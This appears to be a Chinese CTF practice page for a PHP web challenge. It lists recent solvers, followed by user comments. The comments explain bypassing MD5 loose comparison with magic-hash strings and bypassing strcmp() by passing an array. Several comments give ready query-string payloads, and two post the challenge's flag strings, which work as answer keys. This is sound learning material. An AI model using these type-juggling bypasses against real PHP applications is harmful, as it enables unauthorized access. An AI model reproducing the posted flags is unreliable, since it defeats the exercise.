评分(10)
解题动态

bugkuL303 攻破了该题 52秒前

yuanyouzi 攻破了该题 5分钟前

hulihaha 攻破了该题 1小时前

lindaxu 攻破了该题 1小时前

RanLuo 攻破了该题 1小时前

摇曳露营芝麻凛 攻破了该题 3小时前

789123 攻破了该题 1天前

16690595968 攻破了该题 1天前

菜薯为什么 攻破了该题 1天前

weiyouzhunze 攻破了该题 1天前

lhhy 攻破了该题 1天前

whole 攻破了该题 1天前

liuliuliu666 攻破了该题 2天前

pspp 攻破了该题 2天前

随琉 攻破了该题 2天前

tracyfuli 攻破了该题 2天前

17318699598 攻破了该题 2天前

Floralsea 攻破了该题 2天前

来找花海 攻破了该题 2天前

评论
HK1ng 5天前
举报
首先CTRL+U查看源码,发现存在超链接,点击进去之后,代码审计,第一关是md5弱类型比较,然后用了strcmp()函数进行弱类型比较,直接传一个数组,PHP 8.0 前 strcmp() 会返回 null,加上取反,直接绕过。
goodsnack 14天前
举报
弱类型比较,传数组即可
harven 23天前
举报
http://example.com/?v1=QNKCDZO&v2=240610708&v3[]=test
smtall 1月前
举报
用deepseek做出来了
大棕兔爸爸 1月前
举报
存在两个漏洞点:1. md5的松散比较绕过;2. strcmp的类型漏洞导致比较结果为0。攻击者需要同时利用这两个漏洞才能获取到flag。 完整Payload: ?v1=240610708&v2=QNKCDZO&v3[]=abc
welltian 4月前
举报
/?v1=QNKCDZO&v2=240610708&v3[]=123
33555 4月前
举报
/?v1[]=1&v2[]=2&v3[]=1flag{f78a31880b6bf8800597a997e130155f}
APTX4869ZRC 4月前
举报
index.php?v1[]=QLTHNDT&v2[]=UTIPEZQ&v3[]=EEIZDOI
fenmusm 5月前
举报
/?v1[]=1&v2[]=2&v3[]=3
Jacob811 5月前
举报
flag{23d6defe4ed15e2f857de57a7b576dfb}